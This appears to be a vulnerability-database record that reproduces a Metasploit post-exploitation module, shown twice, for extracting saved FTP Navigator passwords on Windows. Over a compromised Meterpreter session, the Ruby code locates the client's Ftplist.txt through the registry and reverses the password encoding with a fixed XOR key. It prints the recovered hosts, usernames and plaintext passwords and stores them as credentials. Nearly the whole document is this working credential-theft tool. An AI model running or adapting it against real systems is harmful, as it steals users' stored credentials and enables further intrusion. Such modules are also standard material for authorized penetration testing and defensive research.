ID MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21
Description
This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/auxiliary/report'
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',
'Description' => %q{
This module extracts saved passwords from the FTP Navigator FTP client.
It will decode the saved passwords and store them in the database.
},
'License' => MSF_LICENSE,
'Author' => ['theLightCosine'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
key = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Navigator_is1\\"
val_name = "InstallLocation"
installdir = registry_getvaldata(key, val_name) || "c:\\FTP Navigator\\"
path = "#{installdir}Ftplist.txt"
begin
ftplist = client.fs.file.new(path,'r')
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Unable to open Ftplist.txt: #{e}")
print_error("FTP Navigator May not Ne Installed")
return
end
lines = ftplist.read.split("\n")
lines.each do |line|
next if line.include? "Anonymous=1"
next unless line.include? ";Password="
dpass = ""
username = ""
server = ""
port = ""
line.split(";").each do |field|
next if field.include? "SavePassword"
if field.include? "Password="
epass = split_values(field)
dpass = decode_pass(epass)
elsif field.include? "User="
username = split_values(field)
elsif field.include? "Server="
server = split_values(field)
elsif field.include? "Port="
port = split_values(field)
end
end
print_good("Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}")
service_data = {
address: Rex::Socket.getaddress(server),
port: port,
protocol: "tcp",
service_name: "ftp",
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :session,
session_id: session_db_id,
post_reference_name: self.refname,
username: username,
private_data: dpass,
private_type: :password
}
credential_core = create_credential(credential_data.merge(service_data))
login_data = {
core: credential_core,
access_level: "User",
status: Metasploit::Model::Login::Status::UNTRIED
}
create_credential_login(login_data.merge(service_data))
end
end
def split_values(field)
values = field.split("=",2)
return values[1]
end
def decode_pass(encoded)
decoded = ""
encoded.unpack("C*").each do |achar|
decoded << (achar ^ 0x19)
end
return decoded
end
end
{"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-03-03T03:06:02", "viewCount": 111, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR/"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645411116}}
{}